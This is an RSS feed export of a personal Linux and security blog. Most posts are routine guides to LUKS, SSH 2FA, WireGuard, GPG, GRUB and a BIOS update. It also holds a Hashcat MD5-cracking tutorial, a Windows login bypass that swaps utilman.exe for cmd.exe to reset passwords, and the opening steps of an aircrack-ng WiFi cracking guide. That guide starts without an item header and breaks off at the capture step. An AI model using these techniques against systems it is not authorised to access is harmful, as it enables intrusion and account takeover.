That&apos;s all! You have successfully encrypted an external drive with LUKS and mounted it on your GNU/Linux system. Remember to safely unmount and close the encrypted drive before disconnecting it to avoid data corruption.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>How to Set Up 2FA on Linux for Enhanced Security</title><link>https://ummit.dev//posts/linux/undefine/2fa-setup-on-linux/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/undefine/2fa-setup-on-linux/</guid><description>This guide walks you through the steps to set up Two-Factor Authentication (2FA) on a Linux server to add an extra layer of security for your system.</description><pubDate>Tue, 10 Dec 2024 00:00:00 GMT</pubDate><content:encoded># Introduction

Recently, through my school, I learned there is a way to set up 2FA on a Linux server, so I started learning how to do it. Now I would like to share it with you.

# Prerequisites

Before you begin, make sure you have the following:

- **A GNU/Linux server**: This guide will use Ubuntu as an example, but the steps should apply to most distributions.
- **A 2FA app**: Popular options include Google Authenticator, Authenticator, or Authy.
- Basic knowledge of Linux commands is assumed.
- Do not use the root account for this setup. Using the root account might cause login issues after enabling 2FA.

## Step 1: Install the 2FA Package

To begin, you need to install the `libpam-google-authenticator` package on your server, which will enable 2FA functionality.

Run the following command to install it:

```bash
sudo apt update
sudo apt install libpam-google-authenticator
```

## Step 2: Configure the 2FA Package

Next, configure the Google Authenticator package by running:

```bash
google-authenticator
```

The system will prompt you with a few questions. You can generally respond with **&apos;yes&apos;** to each one.

Once completed, you&apos;ll see a **QR code**, a **secret key**, and a set of emergency scratch codes; store the scratch codes somewhere safe, as they let you log in if you lose your 2FA device.

## Step 3: Scan the QR Code or Enter the Secret Key

Now, open your 2FA app (Google Authenticator, Authy, etc.), and either:

- **Scan the QR code** displayed on the terminal, or
- **Manually enter the secret key** if you can’t scan it.

Your app will start generating time-based 6-digit codes.

&gt; **Tip:** If you’re using a different 2FA app, the process will be the same. Just make sure to enter the secret key manually if scanning the QR code isn&apos;t an option.

## Step 4: Configure SSH for 2FA

Next, you need to configure SSH to use 2FA. Edit the SSH daemon&apos;s configuration file:

```bash
sudo vim /etc/ssh/sshd_config
```

Make sure these two lines are present (or add them if they aren&apos;t):

```bash
KbdInteractiveAuthentication yes
ChallengeResponseAuthentication yes
```

These settings will enable keyboard-interactive authentication (which includes 2FA).

After saving the changes, close the file.
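
One optional note, assuming you normally log in with SSH keys rather than passwords: to require both your key *and* the 2FA code, `sshd_config` also supports the following directive. Adjust to your setup before using it:

```bash
AuthenticationMethods publickey,keyboard-interactive
```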

## Step 5: Restart SSH Service

To apply the changes, restart the SSH service:

```bash
sudo systemctl restart ssh
```

## Step 6: Configure PAM for 2FA

PAM (Pluggable Authentication Modules) must also be configured to use Google Authenticator. Edit the PAM configuration for SSH:

```bash
sudo vim /etc/pam.d/sshd
```

Add the following line to the file:

```bash
auth required pam_google_authenticator.so
```

Where you place this line in the file matters, because PAM runs modules from top to bottom:

- **Above** the line containing `@include common-auth`: the 2FA code is requested first, followed by your password.
- **Below** `@include common-auth`: your password is requested first, followed by the 2FA code.

Choose the sequence you prefer, save the file, and exit.
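
Once edited, the relevant part of `/etc/pam.d/sshd` contains both the include and the new line; for example (an excerpt, with the order chosen per your preference above):

```bash
@include common-auth
auth required pam_google_authenticator.so
```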

## Step 7: Restart SSH Again

To ensure all changes take effect, restart the SSH service one more time:

```bash
sudo systemctl restart ssh
```

## Step 8: Test 2FA

It’s time to test the 2FA setup. Try SSHing into your server:

```bash
ssh your-username@your-server-ip -v
```

You should first be prompted for your password, and then for the 2FA verification code generated by your app. Example:

```bash
$ ssh user@your-server
Password:
Verification code:
```

If both the password and 2FA code are correct, you will be logged in.

And that&apos;s it! You&apos;ve successfully set up 2FA on your GNU/Linux server.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>How to Build Your Own WireGuard VPN Server and Connect from Anywhere!</title><link>https://ummit.dev//posts/infosec/wireguard-vps/</link><guid isPermaLink="true">https://ummit.dev//posts/infosec/wireguard-vps/</guid><description>Learn how to set up your very own WireGuard VPN server and securely connect from anywhere!</description><pubDate>Sun, 24 Nov 2024 00:00:00 GMT</pubDate><content:encoded>## Introduction

WireGuard is a modern VPN protocol that’s fast, lightweight, and secure. Designed to outperform traditional tunneling protocols like IPsec and OpenVPN, it uses UDP to send traffic, making it ideal for high-performance connections.

In this tutorial, we’ll walk through how to set up your very own WireGuard VPN server and client. Once you’re done, you’ll have a private, secure, and blazing-fast VPN to use wherever you go. Let’s dive in!

### Prerequisites

A GNU/Linux server where you’ll set up the WireGuard VPN.

A client device (e.g., your phone or laptop) with the WireGuard app installed to connect to your server.

### Step 1: Install Wireguard

Let’s get started by installing WireGuard on your server. Before installation, make sure your server is updated and rebooted—this ensures everything runs smoothly since WireGuard includes a kernel module.

```bash
sudo apt update -y &amp;&amp; sudo apt upgrade -y &amp;&amp; sudo apt dist-upgrade -y
sudo apt install wireguard
sudo reboot
```

### Step 2: Login to root user

To avoid typing sudo repeatedly, switch to the root user. This is handy because all WireGuard configuration files are located in `/etc/wireguard`, and root access is required to edit them.

```bash
sudo su
```

### Step 3: Generate the Necessary WireGuard Keys

Time to generate the keys for the server and client. WireGuard uses these keys for secure communication. Here’s what we need:

- Server private key and public key
- Client private key and public key
- Pre-shared key

While you can paste keys directly into configuration files, saving them in files is more organized and makes them easier to reuse.

Now, to generate the server private and public keys, run the following commands:

```bash
cd /etc/wireguard

wg genkey | tee server_privatekey | wg pubkey &gt; server_publickey
```

Now, generate the client private and public keys.

```bash
wg genkey | tee client_privatekey | wg pubkey &gt; client_publickey
```

Finally, generate the pre-shared key. WireGuard provides the dedicated `wg genpsk` command for this:

```bash
wg genpsk &gt; presharedkey
```

You should now have five files in the `/etc/wireguard` directory:

```bash
root@wg-o:/etc/wireguard# ls -l
total 20
-rw-r--r-- 1 root root  45 Nov 24 17:20 client_privatekey
-rw-r--r-- 1 root root  45 Nov 24 17:20 client_publickey
-rw-r--r-- 1 root root  45 Nov 24 17:17 server_privatekey
-rw-r--r-- 1 root root  45 Nov 24 17:17 server_publickey
-rw-r--r-- 1 root root  45 Nov 24 17:17 presharedkey
```

### Step 4: Configure the Wireguard Server

Create a configuration file called `wg0.conf` in `/etc/wireguard`. This file defines the WireGuard server settings.

```bash
vim /etc/wireguard/wg0.conf
```

Add the following configuration, replacing placeholders with your keys and values:

```bash
root@wg-o:/etc/wireguard# cat wg0.conf
[Interface]

# Address is the IP address that you want to assign.
Address = 10.66.66.1/24

# ListenPort is the port that you want to listen to.
ListenPort = &lt;PORT NUMBER&gt;

# PrivateKey is the server private key.
PrivateKey = &lt;SERVER PRIVATE KEY&gt;

# Set the port number of wireguard to 51820
# the interface name is wg0
# if not sure, use the command &apos;ip -c a&apos; to check the interface name
PostUp = iptables -I INPUT -p udp --dport 51820 -j ACCEPT
PostUp = iptables -I FORWARD -i eth0 -o wg0 -j ACCEPT
PostUp = iptables -I FORWARD -i wg0 -j ACCEPT
PostUp = iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
PostDown = iptables -D INPUT -p udp --dport 51820 -j ACCEPT
PostDown = iptables -D FORWARD -i eth0 -o wg0 -j ACCEPT
PostDown = iptables -D FORWARD -i wg0 -j ACCEPT
PostDown = iptables -t nat -D POSTROUTING -o eth0 -j MASQUERADE

### Client 1
[Peer]

# PublicKey is the client public key.
PublicKey = &lt;CLIENT PUBLIC KEY&gt;

# PresharedKey is the pre-shared key.
PresharedKey = &lt;PRESHARED KEY&gt;

# Set this IP you want to assign to the client
AllowedIPs = 10.66.66.2/32
```
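
If you later want more clients, each one gets its own `[Peer]` block with its own key pair and a distinct tunnel IP. A sketch (the keys are placeholders, generated the same way as in Step 3):

```bash
### Client 2
[Peer]
PublicKey = &lt;CLIENT 2 PUBLIC KEY&gt;
PresharedKey = &lt;PRESHARED KEY 2&gt;
AllowedIPs = 10.66.66.3/32
```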

### Step 5: Configure the Wireguard client

On the client device, create a configuration file. You can save it anywhere; let&apos;s say `/root/client1.conf`:

```bash
[Interface]

# PrivateKey is the client private key.
PrivateKey = &lt;CLIENT PRIVATE KEY&gt;

# Address is the IP address that you want to assign.
Address = 10.66.66.2/32

# DNS is the DNS server that you want to assign.
# Optional, if you want to use the DNS server.
DNS = 1.1.1.1,1.0.0.1

[Peer]

# PublicKey is the server public key.
PublicKey = &lt;SERVER PUBLIC KEY&gt;

# PresharedKey is the pre-shared key.
PresharedKey = &lt;PRESHARED KEY&gt;

# Endpoint is the server IP address and port number.
Endpoint = &lt;SERVER IP&gt;:&lt;PORT NUMBER&gt;

# AllowedIPs is the IP address that you want to route.
AllowedIPs = 0.0.0.0/0
```
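
`AllowedIPs = 0.0.0.0/0` routes all of the client&apos;s traffic through the tunnel. If you instead only want to reach hosts on the VPN subnet (split tunneling), a narrower value works; this is an optional variation:

```bash
# Route only the VPN subnet through the tunnel:
AllowedIPs = 10.66.66.0/24
```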

### Step 6: IP Forwarding

Enable IP forwarding on the server so traffic can flow between the server and client.

```bash
echo &quot;net.ipv4.ip_forward=1&quot; | tee -a /etc/sysctl.conf
sysctl -p
```
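
You can read the setting back to confirm it took effect; on the VPN server this should print `1`:

```bash
cat /proc/sys/net/ipv4/ip_forward
```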

### Step 7: Start the WireGuard Server

Enable and start the WireGuard service:

&gt;Note: these commands print nothing if the service starts successfully :)

```bash
systemctl enable wg-quick@wg0.service
systemctl start wg-quick@wg0.service
```

### Step 8: Generate the QR Code

Typing client configuration on your phone can be annoying, so let’s generate a QR code instead! First, install `qrencode`:

```bash
apt install qrencode
```

Now, generate the QR code for the client. The `--read-from` argument is the client configuration file, which is why the path doesn&apos;t matter; you can create the file wherever you like.

```bash
qrencode --read-from=/root/client1.conf --type=UTF8
```

And you should get the QR code.

### Step 9: Connect to the Wireguard Server

Install the WireGuard client on your device (for example, Android) and scan the QR code to connect to the WireGuard server.

You should then see packets being sent and received on the server :) That means you are successfully connected, and you can now enjoy the VPN service provided by your own WireGuard server 🤞🤞🤞

Get the client apk here: [Wireguard Android](https://github.com/WireGuard/wireguard-android)

### Feeling

Honestly, I researched many articles about WireGuard, and most of them were really bad. I think this version is the best one: most articles miss the key point of how to generate the private and public keys, don&apos;t explain it clearly, and leave out the PostUp and PostDown configuration.

So I decided to write this article to help those who are looking for the Wireguard VPN Server tutorial. I hope this article can help you to build your own Wireguard VPN Server :)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>How to Add More Keys and Verify Keys on LUKS</title><link>https://ummit.dev//posts/linux/tools/luks/luks-add-key-or-verify/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/luks/luks-add-key-or-verify/</guid><description>This article will guide you through the process of adding a new key and verifying it on LUKS-encrypted.</description><pubDate>Sun, 24 Nov 2024 00:00:00 GMT</pubDate><content:encoded>## Introduction

If you&apos;re using LUKS (Linux Unified Key Setup) for disk encryption, you might already have one or more passphrases set up for accessing your encrypted volumes. LUKS allows you to manage up to **eight key slots** (numbered 0 to 7), which means you can add additional passphrases for convenience or security purposes. This article will guide you through the process of adding a new key and verifying it.

### Prerequisites

Before proceeding, ensure that you already have at least one LUKS key set up on your device. This is essential because you&apos;ll need an existing passphrase to authenticate when adding a new one.

### Adding a New Key

To add a new passphrase to your LUKS-encrypted volume, use the `cryptsetup luksAddKey` command. Here’s how to do it:

1. **Open a terminal.**
2. **Execute the following command:**

   ```bash
   sudo cryptsetup luksAddKey /dev/nvme0n1p2
   ```

   Replace `/dev/nvme0n1p2` with the actual device identifier of your encrypted volume.

3. **Enter an existing passphrase** when prompted. This is necessary for authentication.
4. **Type the new passphrase** you want to add and confirm it.

This command adds the new passphrase to the next available key slot on the specified LUKS volume.

### Verifying the Key Added

To ensure that the new key has been successfully added, you can use the `cryptsetup luksDump` command:

```bash
sudo cryptsetup luksDump /dev/nvme0n1p2
```

This command will display detailed information about your LUKS volume, including the status of each key slot. You should see that one of the key slots is now filled with your newly added passphrase.

### Testing the Passphrase Without Rebooting

After adding a new passphrase, it&apos;s a good idea to test it immediately without rebooting your system. You can do this using the following command:

```bash
cryptsetup -v open --test-passphrase --type luks /dev/nvme0n1p2
```

Make sure to replace `/dev/nvme0n1p2` with the correct device identifier for your encrypted volume. Enter the new passphrase when prompted. If successful, this indicates that your new key is functioning correctly.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Brute-Force Attack on MD5 Hash Using Hashcat</title><link>https://ummit.dev//posts/infosec/hashcat/</link><guid isPermaLink="true">https://ummit.dev//posts/infosec/hashcat/</guid><description>Learn password cracking techniques using Hashcat on Linux with wordlist-based brute-force attacks on MD5 hashes.</description><pubDate>Mon, 28 Oct 2024 00:00:00 GMT</pubDate><content:encoded>## Introduction

MD5 is a cryptographic hash function that produces a 128-bit hash value, and it is a one-way function: you can&apos;t reverse the hash value to recover the original input. You can, however, break it with a brute-force or wordlist attack. In this article, I&apos;ll guide you through the process of breaking an MD5 hash using Hashcat on Arch Linux or any other GNU/Linux distribution.

&gt;NOTICE: I&apos;ll not cover any guide on OSX or windows. Use GNU/Linux instead.

## Prerequisites

Before we start, you’ll need a wordlist for the brute-force attack. You can easily download a wordlist from the Arch User Repository (AUR) with the following command:

```bash
paru -S wordlists
```

The downloaded wordlists will be located at `/usr/share/wordlists` and will be about 2.1 GB in size.

## Installing Hashcat

Install Hashcat from the official Arch Linux repository using the `pacman` command:

```bash
sudo pacman -S hashcat rocm-hip-sdk rocm-opencl-sdk
```

## Using Hashcat

To begin the brute-force attack on the MD5 hash, use the following command:

```bash
hashcat -m 0 -a 0 -d 2 &lt;value_of_md5&gt; &lt;wordlist_file&gt;
```

Here, `-m 0` selects the MD5 hash mode, `-a 0` selects a straight (wordlist) attack, and `-d 2` picks a specific OpenCL device (omit it to let Hashcat choose). This process may take some time, depending on the complexity of the hash and the size of your wordlist.

Once the process is complete, you can view the cracked value of the MD5 hash using:

```bash
hashcat -m 0 -a 0 &lt;value_of_md5&gt; --show
```

## Advantages of Hashcat

Hashcat is also easy to script. For example, you can use the `find` command to try every wordlist in a directory against a hash file:

```bash
find /usr/share/wordlists/ -type f -exec hashcat -m 0 -a 0 -d 2 hash {} \;
```

This command runs Hashcat once for each wordlist in the specified directory, making it an efficient way to try several wordlists against the same hash file.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>How to install Packet Tracer on Arch Linux</title><link>https://ummit.dev//posts/linux/distribution/archlinux/arch-install-packet-tracer/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/archlinux/arch-install-packet-tracer/</guid><description>Installing Packet Tracer on Arch Linux with AUR, a step-by-step guide.</description><pubDate>Mon, 21 Oct 2024 00:00:00 GMT</pubDate><content:encoded># Introduction

Just today, I was trying to install Packet Tracer on my Arch Linux machine. But the official website has no release for Arch Linux, only a `.deb` version.

I was looking for a way to install it without any hassle. I found a way to install it using AUR. So, I thought of sharing it with you guys. In this article, I will show you how to install Packet Tracer on Arch Linux with AUR.

Cisco Packet Tracer is a network simulation tool used for teaching and learning, also known as the CCNA course lab. Since there&apos;s no official release for Arch Linux, we need to download the `.deb` file from the official website; let me show you how to install it on Arch Linux.

&gt;I won&apos;t be covering the installation of an AUR helper; you should already be familiar with one like `yay` or `paru` :)

## Prerequisites

You need to enroll in the Cisco Networking Academy to download Packet Tracer from the official website.

&gt; https://www.netacad.com/resources/lab-downloads?courseLang=en-US

Choose the Linux `.deb` file and download it.

## Step 1: Git clone the AUR repository

First, we need to clone the AUR repository. Open your terminal and run the following command:

```bash
git clone https://aur.archlinux.org/packettracer.git
```

## Step 2: Change the directory

Now, change the directory to the cloned repository:

```bash
cd packettracer
```

## Step 3: Rename the downloaded file

Now, rename the downloaded file to `CiscoPacketTracer822_amd64_signed.deb` and move it into the cloned repository (run these from the directory where the file was downloaded):

```bash
mv original_file_name.deb CiscoPacketTracer822_amd64_signed.deb # Rename the file
mv CiscoPacketTracer822_amd64_signed.deb packettracer/ # Move the file into the cloned repository
```

This step ensures the file name matches the one expected by the PKGBUILD.

## Step 4: Install the package

Now, install the package using the following command:

```bash
makepkg -si
```

By the way, I noticed that Packet Tracer requires a Java runtime environment :)

## Finished

That&apos;s it! You have successfully installed Packet Tracer on Arch Linux using AUR. You can now start using it by searching for it in the application menu.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>How to Backup Your GPG Key</title><link>https://ummit.dev//posts/linux/tools/gpg/gpg-backup/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/gpg/gpg-backup/</guid><description>Export, secure, and restore your GPG keys for safe backup and transfer across different systems.</description><pubDate>Sat, 28 Sep 2024 00:00:00 GMT</pubDate><content:encoded>## Why?

Guess what! I bought a new laptop this week, so I had to set it up for development, and I also need to sign my git commits. That&apos;s why I&apos;m sharing this article with you all! 🤗

## Introduction

GPG (GNU Privacy Guard) is a powerful tool for encrypting and signing data. Keeping your GPG keys backed up is crucial for maintaining access to encrypted files and messages. In this guide, we&apos;ll walk you through the process of exporting, securely transferring, and importing your GPG keys.

## Step 1: Export Your GPG Key

To create a backup of your GPG key, you&apos;ll first need to export it. Open your terminal and execute the following command, replacing `your-email@example.com` with the email associated with your GPG key:

```bash
gpg --export-secret-keys your-email@example.com &gt; private-key.gpg
```

This command generates a binary file named `private-key.gpg` containing your private key. For additional security, you can also export your public key with the following command:

```bash
gpg --export your-email@example.com &gt; public-key.gpg
```

## Step 2: Secure Your Backup

It’s vital to protect your private key file. Consider the following options:

- **Encryption**: Use an encryption tool to encrypt the `private-key.gpg` file.
- **Password Manager**: Store the file in a password manager that supports file attachments.
- **USB Drive**: Transfer the file to a USB drive and store it in a secure location.

## Step 3: Transfer the Backup

Now that you have your GPG keys backed up securely, transfer the `private-key.gpg` file (and optionally `public-key.gpg`) to your laptop. You can do this via:

- A secure USB drive
- A secure cloud service

## Step 4: Import the Key on Your Laptop

Once you have the backup file on your laptop, you can import your private key using the following command:

```bash
gpg --import private-key.gpg
```

To import the public key, use:

```bash
gpg --import public-key.gpg
```

## Step 5: Verify the Import

To ensure your keys have been imported correctly, list your keys by running:

```bash
gpg --list-keys
```

This command will display all the keys currently stored in your keyring.

## Conclusion

Backing up your GPG key is an essential practice for anyone using encryption to secure their data. By following the steps outlined in this guide, you can ensure that your keys are safely stored and easily recoverable. Always remember to protect your private key, as access to it allows others to decrypt your messages and impersonate you.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Intel Fucked Up and You Need to Update Your BIOS Now !!!</title><link>https://ummit.dev//posts/hardware/intel/intel-0x129/</link><guid isPermaLink="true">https://ummit.dev//posts/hardware/intel/intel-0x129/</guid><description>Critical BIOS update required for Intel 13th and 14th Gen CPUs to fix voltage issues and prevent hardware damage.</description><pubDate>Sat, 07 Sep 2024 00:00:00 GMT</pubDate><content:encoded>## What Happened?

Recently, Intel had a big issue with their 13th and 14th Gen CPUs. The problem stems from a voltage issue that delivers excessive power, leading to instability and potential permanent damage to the CPU. If you have an Intel Core 13th or 14th Gen CPU, you need to update your BIOS to address this issue; otherwise, your CPU may degrade quickly over time.

### Steps to Download and Prepare Your BIOS File:

I will use my motherboard&apos;s BIOS as an example, the [Gigabyte B760M GAMING X AX DDR4](https://www.gigabyte.com/Motherboard/B760M-GAMING-X-AX-DDR4/support#support-childModelsMenu), to show you how to update your BIOS.

1. **Download the BIOS file (F18d):**
   - Go to the support page and download the latest BIOS file.

2. **Extract the ZIP File:**
   - The downloaded file will be named something like `mb_bios_b760m-g-x-ax-ddr4_8arpt040_f18d.zip`. Extract this ZIP file to reveal the BIOS update files.

   ![Example of ZIP File Contents](./F18d.png)

3. **Transfer Files to USB Drive:**
   - Copy the extracted files onto a USB drive. Ensure that the USB drive is formatted to FAT32 for compatibility.

### BIOS Update Information

The BIOS update should include the following key improvements:

- **Update Microcode to 0x129:** Addresses sporadic Vcore elevation behavior, as announced by Intel.
- **Introduce &quot;Intel Default Settings&quot;:** Enabled by default, this setting may need to be disabled to use GIGABYTE PerfDrive profiles effectively.

How you update your BIOS depends on your motherboard. For mine it&apos;s Q-Flash, which lets you manually install the BIOS file you downloaded.

My previous BIOS version was F3, which was quite outdated. During the update process, the system will reboot several times. Note that it won&apos;t boot into the operating system until the update is complete. Once the update is finished, your system will boot normally.

## Checking the BIOS Version

After updating your BIOS, it’s crucial to verify that the CPU microcode version is `0x129` and the BIOS version is `F18d`. Here’s how you can check these details:

### 1. Check CPU Microcode Version

Run the following command in your terminal:

```shell
grep &quot;microcode&quot; /proc/cpuinfo # Check CPU microcode version
```

![Microcode Version Example](./microcode.png)

Make sure the output shows `microcode: 0x129` or something similar indicating the updated microcode version.
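
Microcode revisions are plain hex numbers, so you can compare the reported value against `0x129` directly in the shell. A small sketch (here `mc` is a stand-in for the value printed by the `grep` above):

```shell
# mc stands in for the revision read from /proc/cpuinfo on your machine.
mc=0x129
if [ $((mc)) -ge $((0x129)) ]; then
    echo "microcode is up to date"
else
    echo "microcode is outdated - update your BIOS"
fi
```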

### 2. Check BIOS Version

To verify the BIOS version, use this command:

```shell
sudo dmidecode --type bios # Check BIOS version
```

![BIOS Version Example](./bios_version.png)

Ensure that the output shows `BIOS Version: F18d` or a version that reflects the latest update.

## References

- [Intel Raptor Lake 0x129 microcode review (Phoronix)](https://www.phoronix.com/review/intel-raptor-lake-0x129)
- [July 2024 Update on Instability Reports on Intel Core 13th and 14th Gen Desktop Processors](https://community.intel.com/t5/Processors/July-2024-Update-on-Instability-Reports-on-Intel-Core-13th-and/m-p/1617113#M74792)
- [Megathread for Intel Core 13th &amp; 14th Gen CPU instability issues](https://www.reddit.com/r/intel/comments/1egthzw/megathread_for_intel_core_13th_14th_gen_cpu/)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>How Hackers Break into Systems: Resetting Passwords Without the Old One</title><link>https://ummit.dev//posts/infosec/how-hacker-break-into-systems-without-old-one/</link><guid isPermaLink="true">https://ummit.dev//posts/infosec/how-hacker-break-into-systems-without-old-one/</guid><description>Educational guide to Windows password reset techniques using bootable media and system file manipulation for recovery.</description><pubDate>Mon, 26 Aug 2024 00:00:00 GMT</pubDate><content:encoded>## Introduction

This article is for educational purposes only. Please use this knowledge responsibly. Unauthorized access to systems is illegal and unethical. The methods here are used for legitimate recovery and testing, not for illegal activities.

This article describes a method that uses the same operating system&apos;s installation media to modify system files, rather than booting a different system and mounting the target drive.

## Why?

Sometimes people forget their system password. While there are proper ways to recover or reset a password, this guide will show you a basic method that was common in the past.

## Is it Easy?

Yes, it can be surprisingly easy with the right tools. Here&apos;s a simple overview:

1. **Use a bootable USB drive with Windows on it.**
2. **Replace a critical system file (`utilman.exe`) with `cmd.exe`.**
3. **Restart the system and use the modified file to open a command prompt.**
4. **Use the command prompt to create a new admin user or reset the password.**

## Step 1: Create a Bootable Windows USB

You need a USB drive with a bootable Windows ISO. Search online for guides if you’re not sure how to do this.

## Step 2: Boot from the USB

Insert the USB drive and restart your computer. Press the boot menu key (commonly F12 or F11, depending on your hardware) to choose the USB drive as the boot device.

## Step 3: Open Command Prompt

When you see the Windows Setup screen, press `Shift + F10` to open a command prompt.

## Step 4: Find the Right Drive

The command prompt starts in `X:\Sources` or a similar directory. You need to find your main system drive, usually `C:\`. Use the command:

```cmd
wmic logicaldisk get name
```

Switch to each drive and use `dir` to find the `Windows` folder, then `cd` into `System32`:

```cmd
C:
dir

:: step by step
cd Windows
cd System32

:: or in one line
cd Windows\System32
```

Repeat with `D:\` and others until you find the correct drive.

## Step 5: Rename `utilman.exe`

In the `System32` directory, rename `utilman.exe` to something else:

```cmd
ren utilman.exe utilman2.exe
```

## Step 6: Replace `utilman.exe` with `cmd.exe`

Copy `cmd.exe` and rename it to `utilman.exe`:

```cmd
copy cmd.exe utilman.exe
```

## How Does This Work?

You’ve replaced the utility manager (which appears on the login screen) with a command prompt.

## Step 7: Restart the System

Exit the Windows Setup and restart your computer. At the login screen, click the Utility Manager icon (near the power button). You’ll see a command prompt instead of the usual utility manager.

## Final Step: Reset the Password

In the command prompt, reset the password with:

```cmd
net user &lt;username&gt; &lt;new_password&gt;
```

Replace `&lt;username&gt;` with the actual username and `&lt;new_password&gt;` with your new password.

## Conclusion

After resetting the password, don’t forget to restore the original `utilman.exe` file. Use these commands to put things back:

```cmd
del utilman.exe
ren utilman2.exe utilman.exe
```

## Other Ways

There are other, more complex methods using tools like `Mimikatz` or `ophcrack`, but they require more advanced knowledge and skills.

This method should be straightforward if you have experience with ethical hacking or CTF challenges.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>How to Set the Default Auto Load Seconds in GRUB</title><link>https://ummit.dev//posts/linux/tools/boot-loader/grub/grub-timeout-autoboot/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/boot-loader/grub/grub-timeout-autoboot/</guid><description>Adjust GRUB bootloader timeout settings to control how long the boot menu displays before auto-loading.</description><pubDate>Tue, 06 Aug 2024 00:00:00 GMT</pubDate><content:encoded># Introduction

To set the timeout for auto-boot, follow these steps:

## Step 1: Open the GRUB Configuration File

Open a terminal and run the following command to edit the file with root privileges:

```bash
sudo vim /etc/default/grub
```

## Step 2: Set the Timeout

Adjust the `GRUB_TIMEOUT` to the number of seconds you want GRUB to wait before automatically booting the default entry. For example, to set a 10-second timeout:

```bash
GRUB_TIMEOUT=10
```
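
For context, here is what a minimal `/etc/default/grub` might contain around this setting (values are examples; `GRUB_TIMEOUT_STYLE=menu` makes GRUB show the menu for the whole countdown instead of hiding it):

```bash
GRUB_DEFAULT=0          # entry to boot when the timeout expires
GRUB_TIMEOUT=10         # seconds to wait before auto-booting
GRUB_TIMEOUT_STYLE=menu # display the menu during the countdown
```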

## Step 3: Save and Exit

Save the changes and exit with `:wq`.

## Step 4: Update GRUB Configuration

After editing the GRUB configuration file, regenerate the GRUB configuration:

```bash
sudo grub-mkconfig -o /boot/grub/grub.cfg
```

## Step 5: Reboot

Restart your computer to see the changes take effect.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Setting the Default Kernel Select in GRUB</title><link>https://ummit.dev//posts/linux/tools/boot-loader/grub/grub-default-kernel-select/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/boot-loader/grub/grub-default-kernel-select/</guid><description>Configure GRUB bootloader to automatically select your preferred kernel version at system startup.</description><pubDate>Wed, 31 Jul 2024 00:00:00 GMT</pubDate><content:encoded>## Overview

If you use multiple kernels, the default selected entry may not be the one you want. In my case the default was the zen kernel, but I wanted the default to be lts, so I always had to use the arrow keys to select the kernel I wanted. This article walks you through configuring GRUB to boot into a specific kernel by default, so your system starts with your preferred kernel version automatically.

In general, GRUB already has this feature by setting a variable of `GRUB_DEFAULT`.

### 1. Verify GRUB Entries

To verify the exact menu entries, list them using:

```bash
sudo grep menuentry /boot/grub/grub.cfg
```

This command will show all available menu entries, helping you confirm the correct entry name for `GRUB_DEFAULT`.
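
The raw `grep` output can be noisy. A small `sed` sketch that extracts just the entry titles (shown here against inline sample lines supplied by `printf`; point it at `/boot/grub/grub.cfg` on a real system):

```shell
# Extract the quoted title from menuentry lines; the printf input stands
# in for /boot/grub/grub.cfg.
printf "menuentry 'Arch Linux' --class arch {\n  menuentry 'Arch Linux, with Linux linux-lts' {\n" |
  sed -n "s/^[[:space:]]*menuentry '\([^']*\)'.*/\1/p"
```

For the sample input this prints `Arch Linux` and `Arch Linux, with Linux linux-lts`, giving you the exact strings to paste into `GRUB_DEFAULT`.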

### 2. Edit the GRUB Configuration File

Open the GRUB configuration file with a text editor:

```bash
sudo vim /etc/default/grub
```

### 3. Set the Default Kernel

In `/etc/default/grub`, you have two options to set the default kernel:

- **By Entry Number**: Set the `GRUB_DEFAULT` variable to the position of the kernel entry in the GRUB menu. For example, to select the second entry:

  ```bash
  GRUB_DEFAULT=1
  ```

- **By Menu Entry Name**: Use the exact menu entry string as it appears in the GRUB menu. For example, with linux-lts:

  ```bash
  GRUB_DEFAULT=&quot;Advanced options for Arch Linux&gt;Arch Linux, with Linux linux-lts&quot;
  ```

  Make sure to use the exact string, including spaces and casing.

### 4. Update GRUB Configuration

After editing the GRUB configuration file, regenerate the GRUB configuration:

```bash
sudo grub-mkconfig -o /boot/grub/grub.cfg
```

### 5. Reboot

Restart your system to see the result.

### 6. Done

Now your GRUB menu should automatically select the lts kernel :D

Honestly, GRUB makes everything easy :)

To make a long story short: Aircrack-ng is a network software suite consisting of WiFi security tools that can be used to assess the security of wireless networks. It focuses on different areas of WiFi security, including monitoring, attacking, testing, and cracking.

### Disclaimer

This guide is for educational purposes only. Unauthorized access to wireless networks is illegal and unethical. Always obtain permission from the network owner before attempting to access or test their network security.

Only crack your own network, or one whose owner has allowed you to test it.

## Step 1: Hardware Requirements

To get started with Aircrack-ng, you&apos;ll need a compatible wireless network adapter that supports monitor mode and packet injection.

Also, use a computer with a GNU/Linux operating system, such as Kali Linux, which comes with Aircrack-ng pre-installed, or install it yourself like this:

```bash
sudo pacman -S aircrack-ng
```

&gt;Note: the actions below require sudo privileges throughout, so it&apos;s easier to work as the root user.

## Step 2: Checking Card Status

First, check if your wireless card supports monitor mode and recognizes the wireless interface:

```shell
iwconfig
```
![iwconfig](./iwconfig.gif)

## Step 3: Starting Monitor Mode

Enable monitor mode on your wireless interface `wlan0`. This will disable your network connection.

```shell
airmon-ng start wlan0
```
![airmon-ng start wlan0](./airmon-ng start wlan0.png)

## Step 4: Finding Target WiFi Network

Identify the target WiFi network. To crack it, we will need the following information:

- ESSID (network name)
- BSSID (MAC address of the access point)
- Channel number

```shell
airodump-ng wlan0mon
```
![airodump-ng wlan0mon](./airodump-ng wlan0mon.gif)

## Step 5: Creating Capture File

Capture data from the target network:

```shell
